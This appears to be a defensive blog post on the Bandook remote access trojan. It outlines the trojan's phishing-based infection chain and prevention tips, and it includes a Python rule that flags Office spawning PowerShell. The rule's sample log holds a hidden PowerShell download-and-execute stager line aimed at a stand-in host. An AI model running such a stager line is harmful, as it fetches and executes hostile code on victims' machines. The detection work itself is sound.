Track Common Adversary Tasks Performed Using Bandook

To know more about it, you can go through my detailed document by clicking here

Overview

Bandook is a commercially available RAT, written in Delphi and C++, that is used by Dark Caracal and is also referred to as "Operation Manul"; it was first detected in 2007. It generally targets sensitive sectors (such as government, energy, finance, healthcare, and education) in the USA, South America, Europe, Southeast Asia, and elsewhere.

How Does It Work?

The Bandook malware spreads in three stages. First, a phishing email is sent carrying a Microsoft Word document that contains embedded code; once the document is opened, the malicious code is downloaded. Second, a PowerShell payload that is stored encrypted inside the original Word document is executed. Lastly, this script downloads and executes the final stage of Bandook, i.e. the backdoor.
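The chain described above (a Word document that launches PowerShell, which in turn fetches the final stage) is what a defender can look for in process-creation telemetry. The following Python is an added example and not code from the original post: it parses a small, constructed, pipe-delimited process-creation log and flags Office applications spawning PowerShell, raising the severity when the command line also carries download or obfuscation traits. The log format, hostnames, URL and the base64 placeholder are all made up for the demonstration.

```python
"""Flag the Office -> PowerShell -> download pattern in process-creation logs.

Added example for the Bandook write-up; the log format below is constructed
(ts|host|parent_image|image|cmdline) and is not a real product's format.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Office applications that should not normally launch a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Generic command-line traits of download-and-execute stagers (not Bandook-specific IoCs).
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I,
)
ENCODED_RE = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str   # basename of the parent image, lower-cased
    image: str    # basename of the created image, lower-cased
    cmdline: str


def _basename(path: str) -> str:
    """Reduce a Windows or POSIX path to its lower-cased file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> Optional[ProcEvent]:
    """Parse one record; returns None for malformed lines so a bad row never aborts a scan."""
    parts = line.strip().split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, parent, image, cmdline = parts
    return ProcEvent(ts, host, _basename(parent), _basename(image), cmdline)


def evaluate(ev: ProcEvent) -> Optional[dict]:
    """Return an alert when an Office app spawns a script host, else None.

    Severity is 'high' when the command line also shows a download primitive,
    otherwise 'medium' (encoded or hidden-window flags alone are suspicious but weaker).
    """
    if ev.parent not in OFFICE_PARENTS or ev.image not in SCRIPT_HOSTS:
        return None
    reasons = [f"{ev.parent} spawned {ev.image}"]
    downloads = bool(DOWNLOAD_RE.search(ev.cmdline))
    if downloads:
        reasons.append("download primitive in command line")
    if ENCODED_RE.search(ev.cmdline):
        reasons.append("encoded command")
    if HIDDEN_RE.search(ev.cmdline):
        reasons.append("hidden window")
    return {
        "ts": ev.ts,
        "host": ev.host,
        "severity": "high" if downloads else "medium",
        "reasons": reasons,
    }


def scan(lines: List[str]) -> List[dict]:
    """Run evaluate() over every parseable line and collect the alerts in order."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        alert = evaluate(ev)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample log: one benign Word launch, one Word->PowerShell download stager,
# one benign PowerShell use, one Excel->PowerShell encoded command (placeholder base64),
# and one malformed row. Hosts and the URL are made up.
SAMPLE_LOG = """\
2024-01-01T09:00:01Z|WS01|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|"WINWORD.EXE" /n "C:\\Users\\a\\Downloads\\invoice.docm"
2024-01-01T09:00:07Z|WS01|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/s')"
2024-01-01T09:05:00Z|WS02|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -c Get-ChildItem C:\\Temp
2024-01-01T09:06:12Z|WS03|C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
garbage line without delimiters
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(f"[{a['severity'].upper()}] {a['ts']} {a['host']}: " + "; ".join(a["reasons"]))
```

Running the block prints two alerts: a high-severity one for WS01, where WINWORD.EXE spawned a hidden PowerShell that calls `DownloadString`, and a medium-severity one for WS03, where EXCEL.EXE spawned PowerShell with an encoded command. The benign Word launch and the explorer-launched PowerShell produce nothing, and the malformed row is skipped. The parent/child pairing is the core signal; the command-line regexes only adjust severity, so renaming the stager or changing the download cmdlet does not silence the rule.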

Prevention

The following measures can help mitigate these kinds of threats:
  • Users should be well-trained as well as aware of the potential threats and ways to handle them.
  • Be wary of the emails from untrusted sources.
  • Don't open links or attachments from the untrusted sources.
  • Regularly update your systems, software, and applications.
  • Always use updated antivirus to avoid malicious infections. 
  • Perform cybersecurity audits and mitigate any weaknesses discovered to prevent any kind of attacks.
